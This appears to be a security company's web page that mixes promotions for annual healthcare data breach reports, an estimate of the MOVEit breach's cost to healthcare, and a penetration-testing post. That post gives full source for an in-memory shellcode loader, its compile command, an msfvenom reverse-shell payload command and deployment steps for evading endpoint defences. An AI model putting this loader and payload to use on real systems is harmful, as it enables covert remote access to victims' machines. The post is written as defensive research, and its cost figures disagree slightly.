2025 Healthcare Data Breach Report: Trends and Insights

The 2025 Velocity Healthcare Data Breach Report

Includes Incidents Affecting 500 or More Records Containing Protected Health Information (PHI)

Explore a comprehensive analysis of breach patterns, financial impacts, and emerging cybersecurity risks within the healthcare sector.

2025 Healthcare Data Breaches Report Cover Page

This report shares healthcare breach data to provide context and insight that may assist cybersecurity leaders in ongoing decision-making efforts.

ACCESS THE REPORT

Why this report matters

Healthcare remains one of the most targeted industries, yet the drivers behind breaches continue to evolve rapidly. This report provides clear, data-backed insights that help security leaders understand current trends and make informed decisions with confidence.

What you’ll learn

Built on real data

Every insight is powered by Stern Security’s Healthcare Data Breaches platform bringing clarity to complex data.

Who it’s for

CISOs, CIOs, compliance teams, MSPs, security analysts, and any leader who needs clean, actionable intelligence to guide cybersecurity decisions.

After you submit

You’ll get instant access to the full 2025 Healthcare Data Breach Trends & Insights Report.

Key Report Highlights

Discover the essential insights and trends that are shaping the future of healthcare cybersecurity. Our report offers a comprehensive analysis of breach patterns, financial impacts, and emerging risks.

Icon of a gear, pencil and paper.

In-Depth Analysis

Explore detailed data on breach trends, PHI exposure, and third-party risks, curated from national sources over the past decade.

icon of a check mark

Expert Recommendations

Benefit from expert advice on addressing top vulnerabilities and strengthening resilience against real-world attacks. Stern Security has extensive experience in the healthcare industry, is the winner of the NC Tech Cyber Award, is SOC 2 Type 2 certified, and has been featured on numerous News platforms.

icon of a check mark

Actionable Insights

Gain practical steps to enhance your organization’s security posture and make informed decisions to mitigate risks effectively.

Unlock Critical Insights Today!

Multiple “Impenetrable” Security Platforms, One “Cyborg” Bypass

Multiple “Impenetrable” Security Platforms, One “Cyborg” Bypass

Background

Recently, the Stern Security penetration testing team faced a challenge: bypassing some of the toughest enterprise security defenses available today. Among them was a product that claims 100% MITRE ATT&CK detection, protection, and prevention. Another claimed its multi-layered defensive strategy of pattern matching, behavior monitoring, networking access control lists and sandboxing could detect and prevent malware,  Finally an EDR solution paired with “Next-Gen” Antivirus (NGAV).

Dubbing the attack “The Cyborg Bypass,” the Stern Security team used artificial intelligence (AI) to help create a custom loader executable. Combined with a default shellcode payload, this allowed us to successfully evade multiple layers of security—including SIEM, XDR, EDR, and AV solutions from major vendors.

The Security Landscape

Modern enterprises utilize layered security defenses. SIEM platforms collect, analyze and correlate logs to spot threats, trigger alerts and kickoff automation.  XDR solutions provide comprehensive monitoring across devices and networks, and antivirus/EDR tools scan for known malware and suspicious behaviors and respond.

Common penetration testing payloads from tools like Metasploit and Cobalt Strike usually don’t stand a chance. Defenders have seen them a thousand times, and things like static signatures, behavior-based rules, or sandboxing catch them fast. This makes evasion a real challenge, even if you’re doing everything right.

Leveraging AI to Build a Custom Loader

To get around these defenses, the Stern Security penetration testing team used AI to help build a lightweight custom loader—we’ll call it loader.exe. This loader takes a raw, default shellcode payload (shellcode.bin) straight from disk—no obfuscation, no encryption—and executes it directly in memory. Instead of launching a typical executable payload, it keeps things simple and stealthy, avoiding many of the patterns that security tools are trained to detect.

Proof of Concept (POC)

The loader’s core function is to read the shellcode file into memory and execute it using Windows API calls – loader.cpp:

#include <windows.h>
#include <iostream>
#include <fstream>

void ExecuteShellcode(unsigned char* shellcode, SIZE_T size) {
    void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, size);
    ((void(*)())exec)();
}

int main() {
    std::ifstream file("shellcode.bin", std::ios::binary | std::ios::ate);
    SIZE_T size = file.tellg();
    file.seekg(0, std::ios::beg);
    unsigned char* buffer = new unsigned char[size];
    file.read((char*)buffer, size);
    file.close();

    ExecuteShellcode(buffer, size);
    delete[] buffer;
    return 0;
}

Compile the loader using:

x86_64-w64-mingw32-g++ loader.cpp -o loader.exe -static

Create a basic MSF Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=8080 --platform windows -a x64 -f raw -o shellcode.bin

Deployment Process

  1. Generate raw shellcode payload, we’ve tested both default MSF Venom and Cobalt Strike payloads – saved as shellcode.bin.
  2. Compile the loader executable as above.
  3. Transfer both loader.exe and shellcode.bin to the target machine.
  4. Start the C2 listener.
  5. Execute loader.exe on the target – This will load and run the shellcode in memory.
  6. Establish a stealthy command and control (C2) connection, bypassing SIEM, XDR, and AV.

Understanding Execution and Disk Presence

During this process both the loader (loader.exe) and shellcode (shellcode.bin) are present on the target’s disk during runtime. While the shellcode exists as a file, it’s never executed directly. Instead, the loader reads contents of the shellcode file into memory and executes it from there.  This method completely bypasses monitoring of traditional executable file formats.

This approach lowers the chance of detection, since many security tools prioritize monitoring for suspicious executables and process behavior—not just the presence of a file on disk. Surprisingly, even this simple technique was enough to slip past advanced defenses.

Key Takeaways

AI is quickly becoming a powerful asset in offensive security—not just for crafting exploits, but for evading detection altogether. To keep up, defenders should:

  • Don’t rely solely on signature-based detection: Traditional AV and even many “Next-Gen” tools often miss custom loaders and raw shellcode that don’t match known patterns.
  • Strengthen endpoint visibility: Ensure EDR/XDR solutions are configured to log and alert on suspicious in-memory execution—even when no binary is dropped.
  • Harden systems against loader-style malware: Monitor for uncommon API usage (like VirtualAlloc + execution), and block execution from temporary or user-controlled directories

Conclusion

The blend of AI-assisted tooling and custom payload loaders is raising the stakes for both attackers and defenders. Our ability to bypass enterprise-grade defenses—many of which claim to be impenetrable—highlights just how urgently cybersecurity needs to evolve.

Want to know how your defenses would hold up? Reach out to the Stern Security team to explore your current security posture and learn how real-world testing can help you stay ahead of advanced threats.

Quantifying the MOVEit 0-day Impact on the Healthcare Industry

Quantifying the MOVEit 0-day Impact on the Healthcare Industry

Background

In 2023, Progress Software’s MOVEit file transfer application was the source of a dangerous zero-day vulnerability.  Criminals that exploited this vulnerability were able to gain full access to the files on MOVEit servers.  The research from Stern Security’s 2024 healthcare breach report showed that this MOVEit breach was the cause of 25.9% of the protected health information (PHI) lost last year.  Quantifying the MOVEit 0-day’s impact on healthcare is essential to understanding the full extent of this vulnerability.

MOVEit Incident

Progress Software announced the critical vulnerability in their MOVEit software on May 31, 2023.  Unfortunately, there was evidence that this vulnerability was already exploited by at least May 27, 2023.  Eventually the Cl0p ransomware group claimed responsibility for this incident.  The first healthcare breach due to the MOVEit 0-day was announced on June 11, 2023, and the last was on December 8, 2023.  According to the 2024 Ponemon Data Breach report, the average number of days to discover a data breach was 258 days which makes it easier to understand why healthcare MOVEit breaches were still being reported so late in the year (192 days later). 

Quantifying the Impact

By the end of the 2023, there were 42 healthcare breaches attributed to the MOVEit vulnerability.  Thirty-one (31) of these breaches were from third-parties (business associates of the healthcare organization) and eleven (11) occurred at covered entity locations (healthcare organizations).  These 42 breaches resulted in the exposure of 41,380,105 protected health information (PHI) records.  While there were 708 total reported healthcare breaches last year, the 42 MOVEit breaches accounted for 25.9% of the PHI exposed!

25.9% of Protected Health Information (PHI) Lost in 2023 was due to the MOVEit vulnerability

Third-parties have a significant impact on breach costs.  According to the 2024 Ponemon Breach Report, a third-party breach increases the breach cost by an average of $240,599.  In 2023, most (73.8%) of the healthcare MOVEit breaches lost were from a third-party!

73.8% of the Healthcare MOVEit breaches in 2023  involved third-parties

To quantify this impact, we will multiply the average breach cost in healthcare ($9,770,000) and 42 breaches attributed to this incident to get $410,430,000.

42 breaches x 9,770,000 = $410,340,000

The results show us that the MOVEit breach cost an estimated $410 million in losses!  To put this number in prospective, this is roughly the amount that FEMA (Federal Emergency Management Agency) allocated to Puerto Rico’s recovery efforts from Hurricane Maria ($412 million).  While this was a digital disaster as opposed to a natural disaster, the dollars figures were comparable.

$410M - Comparable cost between MOVEit breach on the healthcare industry and FEMA’s response to Hurricane Maria

Solutions to Reduce Risk

There are numerous protective measures that organizations can do to reduce the risk of another “MOVEit” incident.

  1. Risk Analysis – Every organization should perform a thorough risk analysis to understand the organization’s susceptibility to the latest threats.
  2. Patching – Immediately patch critical vulnerabilities, especially if the assets are exposed or contain sensitive information.  In the case of MOVEit systems, these file transfer servers are generally exposed to the internet so immediately patching a critical flaw is essential.
  3. Minimize Data – Organizations should only store the data necessary to complete their tasks.  Once the data is no longer needed, secure store or dispose of the data.  On file transfer servers such as MOVEit, organizations should immediately remove the transferred data after the use.  The MOVEit servers should not be treated similar to file storage systems that permanently store data.
  4. Penetration Testing – Controls should be tested for effectiveness in comprehensive penetration testing engagements. 
  5. Vulnerability Scanning – Vulnerability scanners should discover unpatched systems.  Externally exposed systems such as file transfer servers should be scanned more frequently.
  6. Limit Access – If a server does not need to be accessible to the entire internet, then limit access to the necessary sources and destinations.  Firewall rules can greatly reduce the threat exposure of a system.
  7. Third-Party Risk Management (TPRM) – Most of the MOVEit breaches involved third parties.  It is critical to perform accurate third-party risk management especially if your third-parties have access to sensitive data such as Protected Health Information (PHI).

Conclusion

The MOVEit 0-day vulnerability was one of the most impactful vulnerabilities of all time.  It cost the healthcare industry an estimated $410 million and exposed 41,380,105 protected health information (PHI) records.  The financial impact is similar to the amount that FEMA allocated to Puerto Rico’s recovery efforts from Hurricane Maria.  Performing cyber risk quantification on incidents provides the opportunity to show business impact in financial terms which is of the upmost importance to leadership.  Utilizing quantifiable data can help organizations obtain the resources needed to protect their organizations.

Bibliography

Cost of a Data Breach Report 2024. (2024). Retrieved from IBM.com: https://www.ibm.com/reports/data-breach

FEMA Awards More than $412 Million in Additional Federal Grants for Puerto Rico. (2018, September 12). Retrieved from FEMA.gov: https://www.fema.gov/press-release/20230502/fema-awards-more-412-million-additional-federal-grants-puerto-rico

2024 Velocity Healthcare Data Breach Report

2024 Velocity Healthcare Data Breach Report

In its third annual healthcare data breach report, Stern Security has critically analyzed over 5,900 data breaches since the Department of Health and Human Services (HHS) began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from HHS to create this comprehensive 2024 Velocity Healthcare Data Breach Report. Stern Security augmented the HHS data by investigating every breach in 2023 to fully understand the cause of the incident.

This report shows critical insights into healthcare breach trends over the past 14 years. It covers everything from the number of breaches attributed to ransomware to the number attributed to third-parties (business associates). This year, Stern Security has added a new breach categorization – the number of breaches due to the MOVEit file transfer software vulnerability. Review the report to see the significant impact that the MOVEit 0-day had on the healthcare industry. Once again, multiple breach milestones were set with more healthcare breaches occurring and more records exposed in 2023 than any previous year. This report puts forth the detailed analysis.

We sincerely thank our sponsors, Trend Micro and the Raleigh ISSA Chapter, whose contributions enable the ongoing pursuit of this important research and the free sharing of our findings.

Report

The full 2024 Velocity Healthcare Data Breach Report can be downloaded below.

Stay in the Loop

If you enjoy the report below and would like to be informed of future reports and research, please fill out the mailing list info below. Don’t worry – we don’t send many emails.

2023 Velocity Healthcare Data Breach Report

2023 Velocity Healthcare Data Breach Report

In its second annual Velocity healthcare data breach report, Stern Security has critically analyzed over 5,000 data breaches since the Department of Health and Human Services (HHS) began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from HHS to create this comprehensive study. Stern Security augmented the HHS data by investigating each breach in 2022 to fully understand the cause of the incident.

This report shows critical insights into healthcare breach trends over the past 13 years. It covers everything from the number of breaches attributed to ransomware to the number attributed to third-parties (business associates). This year, Stern Security has added a new breach categorization – the number of breaches due to analytics software including Meta (Facebook) Pixel. Once again, a new breach record was established with more healthcare breaches occurring in 2022 than any previous year. This report puts forth a detailed analysis.

Mailing List

If you enjoyed our 2023 Velocity Healthcare Breach Report and would like to join our mailing list to stay informed, please complete the form below.

2022 Velocity Healthcare Data Breach Report

2022 Velocity Healthcare Data Breach Report

In its first annual healthcare data breach report, Stern Security has critically analyzed over 4,000 data breaches since the Department of Health and Human Services began tracking the information in 2009. Stern Security utilized data from their HealthcareBreaches.com website as well as published information from Health and Human Services to create this comprehensive report.

This report shows thought-provoking insights into healthcare breach trends over the past 12 years. It covers everything from the number of breaches attributed to ransomware to third-party (business associate) breaches. More healthcare breaches occurred in 2021 than any other year and this report illustrates the detailed analysis.

If you enjoyed the report and want to stay in the loop, please join our mailing list: